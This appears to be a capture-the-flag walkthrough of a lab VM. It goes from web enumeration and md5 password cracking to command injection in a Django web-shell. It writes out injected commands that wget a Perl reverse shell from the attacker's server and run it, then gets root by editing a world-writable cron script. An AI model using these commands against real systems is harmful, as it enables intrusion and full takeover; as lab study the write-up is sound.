Created by Nick Frichette
Software used: nmap, dirbuster, netcat
Nmap showed SSH running on the typical telnet port and two pythonbased HTTP-servers on port 80 and 8080.
Visiting the webserver on port 80 gave nothing of value. Running dirbuster against it gave a few interesting directories.
/dev/ directory showed a page and a link to a weird none-functioning site.
The source for the website showed a couple of possible usernames(before each @) and a md5sum for each user. Searching Google for each hash showed, that the hashed word for nick was “bulldog”.
/admin/ was a django loginpage. Using the username nick with the password “bulldog” worked.
The actual site didn’t have any functionality.
Looking further around and visiting the web-shell link on “/dev/” again showed, that the webshellpage had changed. It now featured a kind of webshell with a few commands and a textarea with the output. Trying to run two commands with “;” didn’t work. Browsering around on the filesystem showed the source for the django application in the file “views.py”
From the source I could read, that the program wasn’t secured against using “&”. As long as a allowed command was in the commandline and not a “;”, anything else could be included after a “&”.
So the easy thing would be to wget a reverse-shell and run it. First I needed a python HTTP server to serve a perl reverse-shell. I then ran “ls & wget http://192.168.1.38:8000/perl-reverse-shell.pl -O /home/django” in the web-shell. And then “ls & perl /home/django/perl-reverse-shell.pl” to connect to a already running netcat session on my workstation.
And we got a shell. This time running as the user “django”.
Looking around for a way to privesc I found the cronjob in /etc/cron.d/runAV which ran a python script every minute as root. The script didn’t do anything and it’s permission allowed it to be edited by everyone.
So I added the python os package for the os.system function to run a command. Then I added a line which would execute a new reverse-shell that I already had wgetted.
And after a minute my new netcat session was connected to by the new reverse-shell. And this time I had root and was able to read the flag.